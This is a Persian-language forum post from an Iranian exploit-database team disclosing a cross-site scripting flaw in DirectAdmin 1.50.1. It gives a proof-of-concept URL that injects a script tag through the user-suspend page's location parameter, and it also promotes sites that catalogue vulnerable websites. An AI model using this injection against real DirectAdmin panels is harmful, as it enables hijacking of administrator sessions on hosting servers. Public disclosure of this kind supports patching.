ارسال پاسخ  ارسال موضوع 
[باگ] Directadmin ControlPanel 1.50.1 Cross-Site-Scripting Vulnerability
01-09-2017, 11:46 PM
ارسال: #1
113 Directadmin ControlPanel 1.50.1 Cross-Site-Scripting Vulnerability
با سلام و درود.
یک باگ xss جدید از دایرکت ادمین directadmin توسط تیم به ثبت رسید.
Directadmin ControlPanel 1.50.1 Cross-Site-Scripting Vulnerability
باگ های دیگر هم پابلیک خواهیم کرد :

کد:
###########################

# Directadmin ControlPanel 1.50.1 Cross-Site-Scripting Vulnerability

###########################

#################################

#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#

#####################################

#####################################

#                Iranian Exploit DataBase

# Directadmin ControlPanel 1.50.1 Cross-Site-Scripting Vulnerability

# Directadmin Version : 1.50.1 And Old Version

# Testet On : Centos 6 - Directadmin 1.50.1

# Vendor site : http://www.directadmin.com

# Pic : http://iedb.ir/img/bug-directadmin-iedb.ir.jpg

# Author : Amir ( iedb.team@gmail.com - https://telegram.me/AmirAm67)

# Site : IeDb.Ir  -  irist.ir   -   xssed.Ir

# Iedb Telegram : https://telegram.me/iedbteam

# Archive Exploit = http://iedb.ir/exploits-6523.html

#####################################

Description :

A client side cross site scripting vulnerability is detected on DirectAdmins Management Web-Application.
The exploit, to allow the user to execute a script.
The bug, on page Suspend and UnSuspend a user or by the manager (admin or reseller).

Bug :

http://ip:2222/CMD_ALL_USER_SHOW

SusPend User And Insert Xss Code :

http://ip:2222/CMD_SELECT_USERS?select3=irist.ir(site)&dosuspend=Suspend&reason=none&location=CMD_ALL_USER_SHOW'"><script>alert(/IrIsT.Ir/)</script>

Pic For This Bug : http://iedb.ir/img/bug-directadmin-iedb.ir.jpg

#####################################

** http://iedb.ir  ==>> Iranian Exploit DataBase And Iranian Security Team

** http://irist.ir  ==>> Register ******** sites

** http://xssed.Ir  ==>>  Sign vulnerable sites ( xss and sql ) (Vulnerability attack information site)

Thanks to : C0dex,B3hz4d,Beni_vanda,Mr_time,Bl4ck M4n,black_security,Yasser,Ramin Assadian,Black_Nofuzi,SecureHost,1TED,Mr_Kelever,Mr_keeper,Mahmod,Iedb,Khashayar​,B3hz4d4,Shabgard,Cl09er,

Be_lucky,Moslem Haghighian,Dr_Iman,8Bit,Javid,Esmiley_Amir,Mahdi_feizezade,Amin_Zohrabi,Shellsho​ck3 And all my friends And All Member In Iedb.Ir Team

#####################################

#  Archive Exploit = http://iedb.ir/exploits-6523.html

#####################################

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-01-09]

###########################

لینک :

http://iedb.ir/exploits-6523.html

بدرود.13
امضای Amir
بِسْمِ اللَّه الرَّحْمنِ الرَّحيمِ

اَللّهُمَّ اِنّى اَسْئَلُكَ بِحَقِّ مُحَمَّدٍ وَ آلِ مُحَمَّدٍ اَنْتُصَلِّىَ عَلى مُحَمَّدٍ وَ آلِ مُحَمَّدِ وَ اَنْ تُنْجِيَنى مِنْ هذَا الْغَمِّ
--------------------------------------------------------

فراموش کن آنچه را که نمی توانی به دست بیاوری و به دست بیاور چیزی را که نمی توانی فراموش کنی

--------------------------------------------------------

شیرینی یکبار پیروزی به تلخی صد بار شکست می‌ارزد.

--------------------------------------------------------

یادت باشه : اعتماد به نفس اولین گام به سوی موفقیت است ! 21

اگر شما سه خصلت :انتقادپذیری، پوزش خواهی ، و شکرگزاری را در خود پرورش دهید

مطمئن باشید که موفقیت به زودی در خانه تان را میزند !

13
بازدید از وبسایت این کاربر یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
ارسال پاسخ  ارسال موضوع 


موضوعات مشابه ...
موضوع: نویسنده پاسخ: بازدید: آخرین ارسال
113 Directadmin ControlPanel 1.50.1 denial of service Vulnerability Amir 0 23 01-09-2017 11:39 PM
آخرین ارسال: Amir
113 [باگ] Faraznet Cms Cross-Site Scripting Vulnerability Amir 0 119 11-07-2016 12:53 PM
آخرین ارسال: Amir
tavajoh Mybb Cms (create forum Page) Cross-Site Script Vulnerability Amir 2 469 04-28-2016 07:18 PM
آخرین ارسال: sogol
111 Directadmin ControlPanel 1.50.0 Version Xss Vulnerability Amir 0 445 04-09-2016 07:09 PM
آخرین ارسال: Amir
111 [باگ] Mybb Tags Plugin Cross-Site Scripting Vulnerability Amir 0 449 04-01-2016 10:12 PM
آخرین ارسال: Amir
Lightbulb N.E.T. E-Commerce Group Cross Site Scripting Vulnerability Amir 0 575 02-24-2015 04:48 PM
آخرین ارسال: Amir
  [نرم افزار]  Douran Portal Cross Site Scripting E1.Coders 1 875 12-09-2014 06:14 PM
آخرین ارسال: Amir
new gassarit CMS Cross-Site Scripting Vulnerability Amir 0 516 11-27-2014 06:16 PM
آخرین ارسال: Amir
new Ahrareandeysheh CMS Cross-Site Scripting Vulnerability Amir 0 552 11-03-2014 10:29 PM
آخرین ارسال: Amir
  PARSADEV CMS Cross-Site Scripting Vulnerability Amir 0 460 11-01-2014 04:04 PM
آخرین ارسال: Amir



کاربران در حال بازدید این موضوع:
1 مهمان

بازگشت به بالابازگشت به محتوا
This forum uses Lukasz Tkacz MyBB addons.